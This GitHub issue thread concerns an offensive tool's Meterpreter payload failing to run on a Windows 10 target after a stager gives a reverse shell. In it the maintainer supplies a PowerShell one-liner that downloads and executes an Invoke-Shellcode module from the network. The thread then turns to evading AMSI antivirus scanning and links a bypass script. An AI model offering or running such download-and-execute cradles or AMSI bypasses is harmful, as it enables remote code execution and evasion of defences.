Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Payload not executing #72

Open
ghost opened this issue Apr 6, 2019 · 7 comments
Open

Payload not executing #72

ghost opened this issue Apr 6, 2019 · 7 comments

Comments

@ghost
Copy link

ghost commented Apr 6, 2019

Stager works but when trying to elevate to a meterpreter session the payload fails to execute.
Generating a binary and executing it on the target machine works fine though.

@Charliedean
Copy link
Contributor

Hi,
Are you using the docker image or the install?

@ghost
Copy link
Author

ghost commented Apr 6, 2019

I'm using the docker image

@Charliedean
Copy link
Contributor

Hi Nteiv,

I have just pulled the current docker version and tested it on Ubuntu and my Windows10 VM and can confirm that it is working for me. This could be an issue with your Windows environment.

Is there any AV running on the Windows device?

@nteiv
Copy link

nteiv commented Apr 11, 2019

image

It's a fresh Windows 10 Pro VM. There are no other antivirus solutions on the machine. As you can see the stager works and I'm able to get a reverse shell back and I'm also able to execute Powershell commands. But when trying to elevate to a Meterpreter session it just hangs. I've also tried running the custom shellcode execution module with a simple winexec calc.exe and, again, get nothing.

@Charliedean
Copy link
Contributor

Ok. Based on this evidence it seems like there is an issue with invokeshellcode powershell module.

Could you please let me know your windows version:
winver in Run dialog( WIN + R )

and also run the following in powershell:

IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/Charliedean/Invoke
Shellcode1803/master/Invoke-Shellcode.ps1")

This will download and import the invoke shellcode module temporarily.
You can then test if its working by executing Invoke-Shellcode and accepting the prompt. If no errors, Calc.exe should open.

@nteiv
Copy link

nteiv commented Apr 12, 2019

That one-liner will get picked up my AMSI

image

so I'm guessing the program doesn't do any obfuscation either?

@Charliedean
Copy link
Contributor

Hi nteiv,

I will look into implementing AMSI bypass on Monday.
Thank you for bringing this to my attention.
The following looks promising as somewhere to start:
https://github.com/kmkz/Pentesting/blob/master/AMSI-Bypass.ps1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants